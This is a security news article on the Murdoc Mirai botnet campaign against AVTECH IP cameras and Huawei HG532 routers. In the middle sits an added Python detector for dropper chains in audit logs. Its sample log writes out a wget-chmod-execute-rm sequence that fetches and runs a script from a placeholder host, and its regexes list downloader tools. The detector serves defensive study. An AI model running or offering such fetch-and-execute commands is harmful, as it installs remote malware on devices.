New Mirai botnet variant Murdoc Botnet targets AVTECH IP cameras and Huawei HG532 routers

Pierluigi Paganini January 21, 2025

Researchers warn of a campaign exploiting AVTECH IP cameras and Huawei HG532 routers to create a Mirai botnet variant called Murdoc Botnet.

Murdoc Botnet is a new Mirai botnet variant that targets vulnerabilities in AVTECH IP cameras and Huawei HG532 routers, the Qualys Threat Research Unit reported.

The botnet has been active since at least July 2024; the experts found over 1300 IPs active in this campaign. Most of the infected systems are in Malaysia, Thailand, Mexico, and Indonesia.

Researchers found over 100 servers distributing Mirai malware and communicating with compromised IPs, indicating the campaign is ongoing.

“Mirai malware, here dubbed as Murdoc Botnet, is a prominent malware family for *nix systems. It mainly targets vulnerable AVTECH and Huawei devices. This botnet also uses some existing exploits (CVE-2024-7029, CVE-2017-17215) to download the next-stage payloads.” reads the advisory.

The payload targets AVTECH cameras, using command-line injection to fetch, execute, and remove shell scripts. The Qualys Threat Research Unit discovered over 500 samples containing ELF files and shell scripts. The shell script is loaded onto IoT devices such as IP cameras and network devices, showing that the Murdoc Botnet specifically targets IoT devices through this mechanism and relies on C2 servers to propagate the new Mirai variant.

The bot shell script uses GTFOBins to fetch, grant execution permissions, execute, and then remove the payload.
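The fetch, chmod, execute, remove sequence described above is a pattern a defender can look for in process audit logs. The following is an added example, not code from the article or from the Qualys report: a small Python detector that flags the four stages hitting the same file path, in order, within one session. The log format ("<session> <command>") and the sample lines are constructed assumptions, and the downloader list covers only a few common binaries.

```python
import re
from collections import defaultdict

# Constructed sample of a per-session command audit log (not from the Qualys report).
SAMPLE_LOG = """\
s1 wget http://dropper.invalid/bot.sh -O /tmp/bot.sh
s1 chmod +x /tmp/bot.sh
s1 /tmp/bot.sh
s1 rm -f /tmp/bot.sh
s2 curl -o /tmp/pkg.tar http://mirror.invalid/pkg.tar
s2 tar xf /tmp/pkg.tar
s3 chmod +x /usr/local/bin/tool
s3 /usr/local/bin/tool --version
"""

PATH = r"(/\S+)"
# Each stage regex captures the file path it acts on as group 1.
STAGES = (
    ("fetch", re.compile(r"\b(?:wget|curl|tftp|ftpget)\b.*?\s-(?:O|o|l)\s+" + PATH)),
    ("chmod", re.compile(r"\bchmod\b\s+\S+\s+" + PATH)),
    ("exec", re.compile(r"^(?:(?:sh|bash)\s+)?" + PATH)),
    ("remove", re.compile(r"\brm\b(?:\s+-\S+)*\s+" + PATH)),
)
ORDER = [name for name, _ in STAGES]


def classify(cmd):
    """Map one command line to (stage, path), or None if it is not a chain stage."""
    for name, rx in STAGES:
        m = rx.search(cmd)
        if m:
            return name, m.group(1)
    return None


def find_dropper_chains(log_text):
    """Return (session, path) pairs where all four stages hit one file, in order."""
    progress = defaultdict(int)  # (session, path) -> index of next expected stage
    hits = []
    for line in log_text.splitlines():
        session, _, cmd = line.partition(" ")
        if (found := classify(cmd)) is None:
            continue
        stage, path = found
        key = (session, path)
        if ORDER[progress[key]] == stage:  # out-of-order stages are ignored
            progress[key] += 1
            if progress[key] == len(ORDER):
                hits.append(key)
                del progress[key]
    return hits
```

Running `find_dropper_chains(SAMPLE_LOG)` flags only session s1, since s2 never executes or removes the fetched file and s3 never fetched the binary it runs.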

Recently, QiAnXin XLab experts observed the Mirai-based Gayfemboy botnet delivering its bot by exploiting more than 20 vulnerabilities; the operators also attempted to exploit weak Telnet credentials. The researchers discovered that attackers targeted the zero-day vulnerability CVE-2024-12856 in Four-Faith industrial routers along with several unknown vulnerabilities affecting Neterbit and Vimar devices.

Gayfemboy exploits various vulnerabilities, including CVE-2013-3307, CVE-2021-35394, CVE-2024-8957, and others in DVRs, routers, and security appliances.
